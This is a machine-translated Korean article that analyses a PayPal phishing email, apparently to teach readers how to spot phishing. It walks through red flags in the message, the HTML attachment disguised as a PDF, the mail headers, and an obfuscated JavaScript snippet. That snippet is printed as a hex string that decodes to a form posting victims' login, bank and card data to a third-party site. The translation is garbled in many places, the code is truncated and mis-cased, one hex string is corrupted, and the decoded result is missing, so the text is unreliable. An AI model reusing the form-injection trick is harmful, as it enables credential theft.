loader

온라인 보안 : 피싱 이메일 분석 분석

Anonim


모든 사람의 정보가 온라인에 노출되는 오늘날의 세계에서 피싱은 바이러스를 항상 제거 할 수 있기 때문에 온라인 공격 중 가장 인기 있고 파괴적인 사례 중 하나입니다. 그러나 은행 정보가 도난 당하면 문제가 발생합니다. 우리가받은 그런 공격 중 하나에 대한 분석이 있습니다.

결국 귀하의 은행 계좌 정보가 중요하다고 생각하지 마십시오. 결국 누군가가 귀하의 계정 로그인을 제어 할 수 있다면 그들은 해당 계정에 포함 된 정보를 알 수있을뿐만 아니라 동일한 로그인 정보가 다른 여러 가지 정보에 사용될 수도 있습니다 계정. 그리고 전자 메일 계정을 손상 시키면 다른 모든 암호를 다시 설정할 수 있습니다.

따라서 강력하고 다양한 비밀번호를 유지하는 것 외에도 가짜 이메일이 진짜임을 가장하는 것이 항상 있어야합니다. 대부분의 피싱 시도는 아마추어 적이지만 일부는 매우 설득력이 있기 때문에 실제 상황에서 피싱을 인식하는 방법과 피싱의 작동 방식을 이해하는 것이 중요합니다.

평범한 시력에 무엇이 있는지 검사하기

대부분의 피싱 시도와 마찬가지로이 예시 전자 메일은 정상적인 상황에서 경고하는 PayPal 계정의 활동을 "알립니다". 따라서 행동 강령은 생각할 수있는 모든 개인 정보를 제출하여 계정을 확인 / 복원하는 것입니다. 다시 말하지만, 이것은 상당히 공식적입니다.

예외가있는 것은 사실이지만 모든 피싱 및 사기 전자 메일에는 메시지 자체에 적색 플래그가 직접로드됩니다. 텍스트가 설득력이 있다고하더라도 메시지 본문 전체에 많은 실수가있어 메시지가 합법적이지 않다는 것을 알 수 있습니다.

메시지 본문

언뜻보기에 이것은 내가 본 피싱 메일 중 가장 좋은 이메일 중 하나입니다. 철자법이나 문법적인 실수가 없으며 당신이 기대하는 바에 따라 말씨를 읽습니다. 그러나 내용을 조금 더 자세히 살펴볼 때 알 수있는 몇 가지 빨간색 플래그가 있습니다.

  • "Paypal"- 올바른 경우는 "PayPal"(자본 P)입니다. 두 변형이 메시지에서 사용 된 것을 볼 수 있습니다. 회사는 브랜딩에 대해 매우 숙고되어 있으므로 교정 과정을 통과하게 될지 의심 스럽습니다.
  • "ActiveX 허용"- 페이팔의 크기가 합법적 인 웹 기반 비즈니스를 본 횟수는 단일 브라우저에서만 작동하는 독점 구성 요소를 사용합니다 (특히 여러 브라우저를 지원할 경우). 물론, 어딘가에 어떤 회사가 그것을하지만, 이것은 붉은 깃발입니다.
  • "안전하게". -이 단어가 나머지 단락 텍스트와 어떻게 겹치지 않는지주의하십시오. 창을 조금 더 늘리더라도 줄 바꿈이나 간격을 올바르게 지정하지는 않습니다.
  • "Paypal!"- 느낌표 앞의 공간이 어색해 보입니다. 내가 확신하는 또 다른 버크는 정당한 이메일에 없을 것이다.
  • "PayPal- Account Update Form.pdf.htm"- Paypal이 특히 사이트의 페이지에 링크 할 수있는 경우 "PDF"를 첨부하는 이유는 무엇입니까? 또한 HTML 파일을 PDF로 위장하려고하는 이유는 무엇입니까? 이것은 그들 모두의 가장 큰 붉은 깃발입니다.

메시지 헤더

메시지 헤더를 살펴보면 붉은 깃발이 두 개 더 표시됩니다.

  • 보낸 사람 주소 :
  • 받는 사람 주소가 없습니다. 나는 이것을 비우지 않았으며 단순히 표준 메시지 헤더의 일부가 아닙니다. 일반적으로 귀하의 이름을 가진 회사가 귀하에게 이메일을 개인화합니다.

첨부 파일

첨부 파일을 열면 스타일 정보가 없어 레이아웃이 올바르지 않다는 것을 즉시 알 수 있습니다. 다시 말하면 PayPal은 단순히 귀하의 사이트에서 귀하에게 링크를 제공 할 수있는 HTML 양식을 이메일로 발송합니까?

참고 : Google은 Gmail의 기본 HTML 첨부 파일 뷰어를 사용했지만 사기꾼으로부터 첨부 파일을 열지 않는 것이 좋습니다. 못. 이제까지. 그들은 종종 귀하의 계정 정보를 훔치기 위해 PC에 트로이 목마를 설치하는 익스플로잇을 포함합니다.

좀 더 아래로 스크롤하면이 양식이 PayPal 로그인 정보뿐만 아니라 은행 및 신용 카드 정보도 묻는 것을 볼 수 있습니다. 일부 이미지가 손상되었습니다.

이 피싱 시도가 한 번에 모든 것을 뒤쫓아가는 것은 명백합니다.

기술적 인 고장

이것이 피싱 시도라는 사실에 근거하여 명확해야하지만, 이제 우리는 이메일의 기술 구성을 분석하고 우리가 찾을 수있는 것을 보게 될 것입니다.

첨부 파일의 정보

먼저 살펴보아야 할 것은 가짜 사이트에 데이터를 제출하는 첨부 파일 양식의 HTML 소스입니다.

소스를 신속하게 볼 때, 모든 링크는 합법적 인 "paypal.com"또는 "paypalobjects.com"을 가리킬 때 유효하게 나타납니다.

이제 우리는 Firefox가 페이지에 모이는 몇 가지 기본 페이지 정보를 살펴볼 것입니다.

보시다시피 일부 그래픽은 정당한 PayPal 도메인 대신 "blessedtobe.com", "goodhealthpharmacy.com"및 "pic-upload.de"도메인에서 가져옵니다.

이메일 헤더의 정보

다음으로 원시 이메일 메시지 헤더를 살펴 보겠습니다. Gmail은 메시지의 원본 메뉴 표시 옵션을 통해이 기능을 사용할 수 있도록합니다.

원본 메시지의 헤더 정보를 보면이 메시지가 Outlook Express 6을 사용하여 작성되었음을 알 수 있습니다. PayPal에 직원이있어이 메시지 각각을 오래된 전자 메일 클라이언트를 통해 수동으로 보내는 사람이 있는지 의심 스럽습니다.

이제 라우팅 정보를보고 발신자와 중계 메일 서버의 IP 주소를 볼 수 있습니다.

"사용자"IP 주소는 원래 보낸 사람입니다. IP 정보를 빠르게 조회하면 송신 IP가 독일에 있음을 알 수 있습니다.

우리가 중계 메일 서버 (mail.itak.at)의 IP 주소를 보았을 때 오스트리아에있는 ISP라는 것을 알 수 있습니다. PayPal이 오스트리아의 ISP를 통해 이메일을 직접 라우팅하는 것은 의심 스럽지만, 이 작업을 쉽게 처리 할 수있는 거대한 서버 팜이있을 때.

데이터는 어디에 있습니까?

따라서 우리는 이것이 피싱 이메일이며 메시지의 출처에 대한 정보를 수집했지만 데이터가 전송되는 위치는 무엇인지 명확히했습니다.

이것을보기 위해서 우리는 바탕 화면에서 HTM 첨부 파일을 먼저 저장하고 텍스트 편집기에서 열어야합니다. 스크롤하면 의심스러운 자바 스크립트 블록을 제외하고 모든 것이 순서대로 표시됩니다.

Javascript의 마지막 블록의 전체 소스를 깨고 다음을 봅니다.


// 저작권 © 2005 Voormedia - WWW.VOORMEDIA.COM
VAR I, Y = X "3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; Y = "(I = 0; I

Javascript 블록에 포함 된 임의의 문자 및 숫자로 구성된 많은 혼란스러운 문자열을 볼 때마다 대개 의심스러운 것입니다. 코드를 보면 변수 "x"가이 큰 문자열로 설정된 다음 변수 "y"로 디코딩됩니다. 변수 "y"의 최종 결과는 HTML로 문서에 기록됩니다.

큰 문자열은 숫자 0-9와 문자 af로 만들어지기 때문에 간단한 ASCII 대 16 진수 변환을 통해 인코딩 될 가능성이 큽니다.

3c666f726d206e616d653d226d6166d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

번역 대상 :

이것은 PayPal이 아닌 불량 사이트에 결과를 보내는 유효한 HTML 양식 태그로 디코딩하는 것은 우연이 아닙니다.

또한 양식의 HTML 소스를 볼 때이 양식 태그가 Javascript를 통해 동적으로 생성되므로 보이지 않습니다. 이것은 텍스트 편집기에서 직접 첨부 파일을 여는 것과는 대조적으로 누군가가 첨부 파일의 생성 된 소스를보기 만하면 HTML이 실제로 수행하고있는 것을 숨길 수있는 영리한 방법입니다.

문제가되는 사이트에서 빠른 whois를 실행하면 이것이 인기있는 웹 호스트 인 1and1에서 호스팅되는 도메인임을 알 수 있습니다.

눈에 띄는 점은 도메인이 "dfh3sjhskjhw.net"과 같은 이름 대신에 읽을 수있는 이름을 사용하고 도메인이 4 년간 등록되었음을 나타냅니다. 이 때문에이 도메인이 도용 당하여이 피싱 시도에서 폰으로 사용 된 것 같습니다.

냉소는 좋은 국방이다.

온라인에서 안전하게 지내기 위해서는 절대로 냉소주의가 필요합니다.

예제 이메일에 붉은 깃발이 더 많이 있음을 확신하지만 위에 지적한 것은 몇 분의 시험을 거친 후에 보았던 지표입니다. 가설 적으로, 이메일의 표면 수준이 정당한 100 %를 모방한다면, 기술적 분석은 여전히 ​​그 본질을 드러 낼 것입니다. 이것이 당신이 볼 수있는 것과 볼 수없는 것을 모두 검사 할 수있는 이유입니다.

에디터의 선택